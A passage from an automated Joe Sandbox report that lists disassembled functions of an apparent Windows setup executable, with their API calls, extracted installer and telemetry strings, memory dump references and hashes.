                                                                                              • Opcode ID: 7cea98c33b06495dcb08f262fa224e50f8a8109ca1092eaaf8d6bb2efd3fe0ff
                                                                                              • Instruction ID: 5be0f7bfb7d27671c9edf6757f76480b05188e4ab8c2d75c305af79aaaf5d4a6
                                                                                              • Opcode Fuzzy Hash: 7cea98c33b06495dcb08f262fa224e50f8a8109ca1092eaaf8d6bb2efd3fe0ff
                                                                                              • Instruction Fuzzy Hash: CD516D71A0421A9FDB10DFA8CD88A9EBBB9EF4A754F141124F901F7296E760ED04CF50
                                                                                              Function 6C5DD937 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 394COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 6C5DDA74
                                                                                              • GetTickCount.KERNEL32 ref: 6C5DDA8F
                                                                                              • GlobalFree.KERNEL32(?), ref: 6C5DDB44
                                                                                              • ImpersonateLoggedOnUser.ADVAPI32(?,0000004C,6C5DC228,?,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6C5E2A06
                                                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 6C5E2A10
                                                                                              • RevertToSelf.ADVAPI32(?,?,?,00000000), ref: 6C5E2CBB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$ErrorFreeGlobalImpersonateLastLoggedRevertSelfUser
                                                                                              • String ID: http%s://%s/%s
                                                                                              • API String ID: 1105026337-335662767
                                                                                              • Opcode ID: 458f46670aa01c1132a9bb050dd685857329ae0a79a01c809fd81db90ce44ee6
                                                                                              • Instruction ID: b0335586ce7c16906a7fd4a7060f9383c652a330761e67f671035ed54465923b
                                                                                              • Opcode Fuzzy Hash: 458f46670aa01c1132a9bb050dd685857329ae0a79a01c809fd81db90ce44ee6
                                                                                              • Instruction Fuzzy Hash: 7DE1C170A0134ADBDB05DF98CC84F9E7BB8FB89708F16405AE9109BA64C770E844CF64
                                                                                              Function 6C5DC069 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 368COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ResetEvent.KERNEL32(?,0000003C), ref: 6C5DC165
                                                                                              • ResetEvent.KERNEL32(?), ref: 6C5DC16E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: EventReset
                                                                                              • String ID: MSDW
                                                                                              • API String ID: 2632953641-1205502275
                                                                                              • Opcode ID: 2554c19b85bb72fd43a3c7f986337ebc4d9689e83c8e34dd733ef83465013a43
                                                                                              • Instruction ID: 79cff1b1dc16b0990956b301da721d9bac436a17eea8a909f90b3f4afd563762
                                                                                              • Opcode Fuzzy Hash: 2554c19b85bb72fd43a3c7f986337ebc4d9689e83c8e34dd733ef83465013a43
                                                                                              • Instruction Fuzzy Hash: 1DD1B170641344EFDB01EFA9CC84FAA3BB9BB08708F26051AF556D6AA1D771E844CF18
                                                                                              Function 639502E2 Relevance: 21.2, APIs: 14, Instructions: 184windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 639502F9
                                                                                                • Part of subcall function 6394EDAE: SetWindowTextW.USER32(?,?), ref: 6394EDC5
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 6395030A
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395031E
                                                                                              • ShowWindow.USER32(?,00000000), ref: 6395033A
                                                                                              • SendMessageW.USER32(?,000000F5,00000000,00000000), ref: 63950382
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 639503B6
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 639503C1
                                                                                              • EnableWindow.USER32(?,00000000), ref: 639503EB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 63950409
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 63950414
                                                                                              • EnableWindow.USER32(?,00000000), ref: 6395043E
                                                                                              • SetDlgItemTextW.USER32(?,00000069,00000000), ref: 63950462
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6395048B
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 6395049A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$Text$EnableLong$MessageSendShow
                                                                                              • String ID:
                                                                                              • API String ID: 3359463025-0
                                                                                              • Opcode ID: a2fb37a4e05d7b4effab5ee1fcfd4b1066fb040a9e30427b78ee5cd402ba42e9
                                                                                              • Instruction ID: 66717a9d0d91457cbb02056bab106e9c2e3bcce41259910090dd2fe28210f687
                                                                                              • Opcode Fuzzy Hash: a2fb37a4e05d7b4effab5ee1fcfd4b1066fb040a9e30427b78ee5cd402ba42e9
                                                                                              • Instruction Fuzzy Hash: 4D613739600600AFDB14EF64C888F99BBF6BF8A714F1045A8F656DB3A1DB71A954CF00
                                                                                              Function 6395D353 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 163windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 6395D38D
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E179
                                                                                                • Part of subcall function 6394E153: GetParent.USER32 ref: 6394E18B
                                                                                                • Part of subcall function 6394E153: GetWindowRect.USER32(?,?), ref: 6394E1A5
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E1BB
                                                                                                • Part of subcall function 6394E153: MonitorFromWindow.USER32(?,00000002), ref: 6394E1DA
                                                                                              • SetWindowTextW.USER32(?,?), ref: 6395D3A3
                                                                                                • Part of subcall function 6395D149: __EH_prolog3.LIBCMT ref: 6395D150
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D198
                                                                                                • Part of subcall function 6395D149: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6395D1AF
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D1E4
                                                                                                • Part of subcall function 6395D149: GetDlgItem.USER32(?,00000068), ref: 6395D1F5
                                                                                                • Part of subcall function 6395D149: SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6395D209
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D231
                                                                                                • Part of subcall function 6395D149: GetDlgItem.USER32(?,00000069), ref: 6395D242
                                                                                                • Part of subcall function 6395D149: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6395D256
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D27E
                                                                                                • Part of subcall function 6395D073: __EH_prolog3.LIBCMT ref: 6395D07A
                                                                                                • Part of subcall function 6395D073: SetDlgItemTextW.USER32(?,00000065,?), ref: 6395D130
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 6395D3B9
                                                                                                • Part of subcall function 63950B11: SetWindowLongW.USER32(?,000000FC,?), ref: 63950B2D
                                                                                              • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 6395D3E4
                                                                                                • Part of subcall function 6395D86C: _memset.LIBCMT ref: 6395D8B6
                                                                                                • Part of subcall function 6395D86C: SendMessageW.USER32(?,0000043A,00000001,?), ref: 6395D8D9
                                                                                              • SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 6395D3FC
                                                                                                • Part of subcall function 6395CFA5: __EH_prolog3.LIBCMT ref: 6395CFAC
                                                                                                • Part of subcall function 6395CFA5: GetDlgItem.USER32(?,00000067), ref: 6395D018
                                                                                                • Part of subcall function 6395CFA5: SetWindowLongW.USER32(?,000000FC,?), ref: 6395D041
                                                                                                • Part of subcall function 6395CFA5: SetDlgItemTextW.USER32(?,00000067,?), ref: 6395D05A
                                                                                                • Part of subcall function 6395D2BF: __EH_prolog3.LIBCMT ref: 6395D2C6
                                                                                                • Part of subcall function 6395D2BF: SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6395D2FC
                                                                                                • Part of subcall function 6395D2BF: SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6395D33B
                                                                                              • GetDlgItem.USER32(?,0000000B), ref: 6395D424
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 6395D42D
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395D482
                                                                                              • GetDlgItem.USER32(?,0000006A), ref: 6395D4D5
                                                                                              • PostMessageW.USER32(?,000006F5,00000000,00000000), ref: 6395D53E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Message$Send$Text$H_prolog3ImageLoadLong$Parent$EnableFromMonitorPostRect_memset
                                                                                              • String ID: IDS_PRINT$IDS_SAVE
                                                                                              • API String ID: 2800768353-3437764585
                                                                                              • Opcode ID: 6dc2c897266b1d92cc8f3b5566fbc211a4ddc1664ca521c58c66075dc68cb1c1
                                                                                              • Instruction ID: f537e7801acf6f7cd7e8b12d2accc3563ac3a0b80111fc07e6884a767cf78711
                                                                                              • Opcode Fuzzy Hash: 6dc2c897266b1d92cc8f3b5566fbc211a4ddc1664ca521c58c66075dc68cb1c1
                                                                                              • Instruction Fuzzy Hash: 2D517F756083019FDB10EF64C884B1ABBE5FF8AB28F040959F5559B3A0DB71E864CF52
                                                                                              Function 63965A85 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 63965A8C
                                                                                              • GetLastError.KERNEL32 ref: 63965AFF
                                                                                                • Part of subcall function 6395F21D: _wcsnlen.LIBCMT ref: 6395F1B2
                                                                                              • GetLastError.KERNEL32 ref: 63965B39
                                                                                              • GetLastError.KERNEL32 ref: 63965BC8
                                                                                              • PathStripPathW.SHLWAPI(?), ref: 63965BFB
                                                                                                • Part of subcall function 639681DE: _memcpy_s.LIBCMT ref: 63968224
                                                                                              • CloseHandle.KERNEL32(?), ref: 63965C85
                                                                                              • GetLastError.KERNEL32 ref: 63965C8D
                                                                                              Strings
                                                                                              • GetProcessImageFileName, xrefs: 63965BD1
                                                                                              • psapi.dll, xrefs: 63965B62
                                                                                              • EnumProcessModules failed with error %u, will try GetProcessImageFileName, xrefs: 63965B43
                                                                                              • OpenProcess, xrefs: 63965C96
                                                                                              • GetModuleBaseName, xrefs: 63965B08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Path$CloseH_prolog3_catchHandleStrip_memcpy_s_wcsnlen
                                                                                              • String ID: EnumProcessModules failed with error %u, will try GetProcessImageFileName$GetModuleBaseName$GetProcessImageFileName$OpenProcess$psapi.dll
                                                                                              • API String ID: 747609879-952504876
                                                                                              • Opcode ID: 880df26b275f66edebfc859942c41b4c8e48ebc85d260a46430896acf34e8d1f
                                                                                              • Instruction ID: c6a3cef8f2a62a7124aa279b78ae1ee7a98aaafa5f4505146a9f0cc2e7d01f3d
                                                                                              • Opcode Fuzzy Hash: 880df26b275f66edebfc859942c41b4c8e48ebc85d260a46430896acf34e8d1f
                                                                                              • Instruction Fuzzy Hash: E0519071A05209EFEB00EFB8C948A9E7BB9EF5AB18F044518F551DB292CB30D950CF61
                                                                                              Function 6395AAC2 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 6395AAF3
                                                                                              • IsWindow.USER32(?), ref: 6395AB3B
                                                                                              • GetDlgItem.USER32(FFFFFF96,00000068), ref: 6395ABA3
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395ABAB
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6395ABC6
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6395ABF2
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6395ABF5
                                                                                              • LeaveCriticalSection.KERNEL32(6395A159,?), ref: 6395AC04
                                                                                              • IsWindow.USER32(?), ref: 6395AC32
                                                                                              Strings
                                                                                              • Launching Install operation. Download operation is completed., xrefs: 6395AB70
                                                                                              • Download failed. No performer will be called., xrefs: 6395AB21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSectionWindow$EnterLeave$ItemShowText
                                                                                              • String ID: Download failed. No performer will be called.$Launching Install operation. Download operation is completed.
                                                                                              • API String ID: 1766897411-1922595129
                                                                                              • Opcode ID: 9c43d64a82a3259c1c5de4964bb2f38c29b320450c367820accd74b2077b7f9b
                                                                                              • Instruction ID: 5f2b72e8c8ce06d859998b515526767d0f3795f85990b1d6f2a0783d676e786f
                                                                                              • Opcode Fuzzy Hash: 9c43d64a82a3259c1c5de4964bb2f38c29b320450c367820accd74b2077b7f9b
                                                                                              • Instruction Fuzzy Hash: B85161751047049FDB12EF34C888A8A7BF5FF46B65F048558F8668B261C731E994CF90
                                                                                              Function 6396528B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 125registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(63982FC8,00000000,?,00000000), ref: 639652B7
                                                                                              • GetClassInfoExW.USER32 ref: 639652F1
                                                                                              • GetClassInfoExW.USER32(?,?), ref: 63965306
                                                                                              • LeaveCriticalSection.KERNEL32(63982FC8), ref: 6396530D
                                                                                              • LoadCursorW.USER32(?,?), ref: 63965352
                                                                                              • swprintf.LIBCMT ref: 6396537C
                                                                                              • GetClassInfoExW.USER32(?,00000000,?), ref: 6396539F
                                                                                              • RegisterClassExW.USER32(?), ref: 639653AF
                                                                                              • LeaveCriticalSection.KERNEL32(63982FC8), ref: 639653DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegisterswprintf
                                                                                              • String ID: 0$ATL:%p
                                                                                              • API String ID: 1053483253-2453800769
                                                                                              • Opcode ID: e56359305fbde06bfc98a5ce812af0fd4a7a87926972701fef18e0fcca1c3e82
                                                                                              • Instruction ID: aab54cadb8e5d1735c6b906fb4ad86148d26098a14cc10d2756d68995cf47564
                                                                                              • Opcode Fuzzy Hash: e56359305fbde06bfc98a5ce812af0fd4a7a87926972701fef18e0fcca1c3e82
                                                                                              • Instruction Fuzzy Hash: 07417676509301DFDB15EF64C88096A7BB8FF8AB90B00064AFD548B24AE770D841CFA1
                                                                                              Function 6395A6A1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 121timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6395A214: __CxxThrowException@8.LIBCMT ref: 6395A228
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 6395A6E2
                                                                                              • SetPropW.USER32(00000000,RotatingIconDisplayTHIS,?), ref: 6395A6F1
                                                                                              • SetTimer.USER32(?,00000002,000003E8,Function_0001A051), ref: 6395A70B
                                                                                              • GetDlgItem.USER32(?,0000006A), ref: 6395A721
                                                                                              • SetPropW.USER32(00000000,RotatingIconDisplayTHIS,?), ref: 6395A730
                                                                                              • GetDlgItem.USER32(?,00000067), ref: 6395A740
                                                                                              • GetDlgItem.USER32(?,0000006B), ref: 6395A751
                                                                                              Strings
                                                                                              • Launching Download operation. Install operation will follow after download is complete., xrefs: 6395A7D8
                                                                                              • Item(s) availability state is "Error". Exiting setup., xrefs: 6395A7E2
                                                                                              • RotatingIconDisplayTHIS, xrefs: 6395A6EB, 6395A72A
                                                                                              • Launching Download and Install operations simultaneously., xrefs: 6395A7C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Prop$Exception@8ThrowTimer
                                                                                              • String ID: Item(s) availability state is "Error". Exiting setup.$Launching Download and Install operations simultaneously.$Launching Download operation. Install operation will follow after download is complete.$RotatingIconDisplayTHIS
                                                                                              • API String ID: 3010864479-2919304341
                                                                                              • Opcode ID: 1c497e1f2dd44f10cb499c64d6e08fafa169ecfb36b4ebef69f6515e02ef3ebe
                                                                                              • Instruction ID: 15a0a1c6e3c2889794d101596a349ce0e78925094293dff654c9176e93176fdd
                                                                                              • Opcode Fuzzy Hash: 1c497e1f2dd44f10cb499c64d6e08fafa169ecfb36b4ebef69f6515e02ef3ebe
                                                                                              • Instruction Fuzzy Hash: 4F416634700602AFDB05EF74C888A85B7B9FF5A715F004158F5669B2A1CB31E860CFA5
                                                                                              Function 6C5DBB55 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(00000030,?,00000000), ref: 6C5DBB79
                                                                                              • GetCurrentProcess.KERNEL32(?,00100000,00000000,00000000,?,00000000), ref: 6C5DBB9A
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 6C5DBBA0
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 6C5DBBA3
                                                                                              • LeaveCriticalSection.KERNEL32(00000030,?,00000000), ref: 6C5DBBBC
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 6C5E00A1
                                                                                              • SetEvent.KERNEL32(?,Upload Completion,00000001,?,00000000,?,?,00000000), ref: 6C5E0100
                                                                                              • CloseHandle.KERNEL32(?,00000000), ref: 6C5E012A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalCurrentHandleProcessSection$CloseDuplicateEnterErrorEventLastLeave
                                                                                              • String ID: Upload Completion$Upload Thread Exit
                                                                                              • API String ID: 3688531783-3056875662
                                                                                              • Opcode ID: 85de644ef219720c72739e662c1a8ca21db072dca2913e80de6f45ff268c9819
                                                                                              • Instruction ID: afa10ec658e43d88854457157a9cfbf8fc01f0dafd473ec4b69afa2283cc49c9
                                                                                              • Opcode Fuzzy Hash: 85de644ef219720c72739e662c1a8ca21db072dca2913e80de6f45ff268c9819
                                                                                              • Instruction Fuzzy Hash: 9341D231901348EFDF10EF99CD84E9EBBB9BB89309F52446AE411D6951C775E980DF04
                                                                                              Function 6C5D56B0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 157fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempFileNameW.KERNEL32(00000000,WER,00000000,?,00000000,00000000,?), ref: 6C5D5756
                                                                                              • DeleteFileW.KERNEL32(?), ref: 6C5D5774
                                                                                              • CreateFileW.KERNEL32(?,C0000000,?,00000104,00000002,?,00000000), ref: 6C5D57B6
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000000), ref: 6C5D57D7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6C5D57F9
                                                                                                • Part of subcall function 6C5D583D: GetTempPathW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5D5875
                                                                                                • Part of subcall function 6C5D583D: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 6C5D58A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileNamePath$LongTemp$CloseCreateDeleteHandle
                                                                                              • String ID: 2$WER
                                                                                              • API String ID: 1638618745-1393268543
                                                                                              • Opcode ID: 70cd92c53ca89e20db4adff2011d14f4218b1a25c87967e01940ce866dcc360d
                                                                                              • Instruction ID: d8cf36955d645abda3566b7ddda3ed7610a6be5909960395a80d2d51e83e73d1
                                                                                              • Opcode Fuzzy Hash: 70cd92c53ca89e20db4adff2011d14f4218b1a25c87967e01940ce866dcc360d
                                                                                              • Instruction Fuzzy Hash: C051BFB1A01319DBDF108F68CC44FD977B4EB48318FA241A5E629E7591D730EAC58F68
                                                                                              Function 6C5E6327 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E634C
                                                                                              • GetLastError.KERNEL32 ref: 6C5E63D4
                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E63FA
                                                                                              • GetLastError.KERNEL32(D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E6406
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                                • Part of subcall function 6C5E7DFE: RegCloseKey.ADVAPI32(00000001,?,?,?,6C5E6448,80000002,Software\Microsoft\SQMClient,0000000C,MachineId,?,D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E7F28
                                                                                              • LocalFree.KERNEL32(00000000,MachineId,?,D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E6486
                                                                                              • SetLastError.KERNEL32(0000054F,MachineId,?,D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E648F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$DescriptorSecurity$CloseConvertFreeLocalMessageStringTracememset
                                                                                              • String ID: D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD)$MachineId$Software\Microsoft\SQMClient$W
                                                                                              • API String ID: 2649899325-766622882
                                                                                              • Opcode ID: e7e296a3a4675f0c835f550e71779207a3a29053b0f4b5dc83944df730e91a5c
